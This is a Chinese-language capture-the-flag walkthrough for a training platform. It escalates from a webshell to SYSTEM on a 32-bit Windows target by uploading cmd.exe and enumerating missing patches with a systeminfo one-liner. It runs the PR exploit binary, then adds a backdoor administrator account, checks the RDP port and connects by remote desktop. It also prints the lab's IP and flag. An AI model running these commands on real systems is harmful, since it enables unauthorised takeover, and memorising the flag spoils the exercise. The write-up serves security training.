zoukankan      html  css  js  c++  java
  • 第六章、SYSTEM!POWER

    第六章 SYSTEM!POWER

    0x01. 明确目标

    https://hack.zkaq.cn/battle/target?id=3eb7bec4a7e95297
    

    image-20210228224639596

    嘿嘿 , 不知道你笑了没 , 点击传送门 , 发现点不开 , 之好点击备用传送门了 , 嘿嘿

    image-20210228224744635

    四层相识的感觉 , 废话不就是上一章那webshell的站点吗 , ok 通过webshell 提权 , 然后flag在c盘根目录下

    获取webshell的方法 , 我就不介绍了 , 直接看第五章即可

    0x02. 提权

    尝试直接读取c:\flag.txt , 发现果然没有权限

    image-20210301111357185

    image-20210301111336866

    在caidao打开终端 , 查看当前用户权限

    image-20210301111511704

    发现拒绝访问 , 也就是当前用户的权限 , 不能执行默认的cmd.exe , 我们可以尝试自己上传一个cmd.exe到可执行

    目录下 , 注意这台靶机是32位的 , 要用32位的cmd.exe

    image-20210301112402051

    紧接着在菜刀中设置终端为当前上传的cmd.exe

    setp D:\05\06\UploadFiles\cmd.exe
    

    image-20210301112604220

    通过命令查看可利用的exp提权漏洞

    systeminfo>micropoor.txt&(for %i in ( KB977165 KB2160329 KB952004 KB2503665 KB2592799 KB2707511 KB2829361 KB2850851 KB3000061 KB3045171 KB3077657 KB3079904 KB3134228 KB3143141 KB3141780 ) do @type micropoor.txt|@find /i "%i"|| @echo %i you can fuck)&del /f /q /a micropoor.txt
    

    image-20210301113055197

    发现没有打KB952004这个补丁 , 可以通过PR提权 , 上传pr

    image-20210301113222351

    通过pr.exe运行系统命令 , 提权成功

    image-20210301113420154

    0x03. 获取flag

    接下来做的就是添加管理员账号 , 3389远程连接靶机 , 查看flag

    添加管理员账号

    pr.exe "net user yjh 123456 /add"
    pr.exe "net localgroup administrators yjh /add"
    

    image-20210301114048436

    查看是否开否终端服务以及对应的端口是否为3389

    net start
    

    image-20210301115302464

    REG query HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\WinStations\RDP-Tcp /v PortNumber
    

    image-20210301114635660

    0xd3d转换成十进制就是3389

    使用远程桌面连接 , 连接靶机

    win + r --> 输入 迷失天使城的首字母(mstac) --> 回车 , 输入靶机的公网ip

    59.63.200.79
    

    哎呦一激动忘记截图了 , 我相信各位师傅你们都会

    image-20210301115844502

    获取flag

    zkz{F3ck_power_sysstem}
    
  • 相关阅读:
    个人介绍
    C++ 之 第四课 C++中的运算符、表达式
    Delphi 之 第六课 过程与函数
    Delphi 之 第五课 流程语句
    VB 之 第三课 VB API 字体函数的应用
    C++ 之 第三课 C++数据类型
    Delphi 之 第四讲 自定义数据类型
    Delphi 之 第三课 详解数据类型
    C++ 之 第二课 C++类、函数的讲解
    VB API 第二课 之 字符串大小写转换
  • 原文地址:https://www.cnblogs.com/xcymn/p/15712479.html
Copyright © 2011-2022 走看看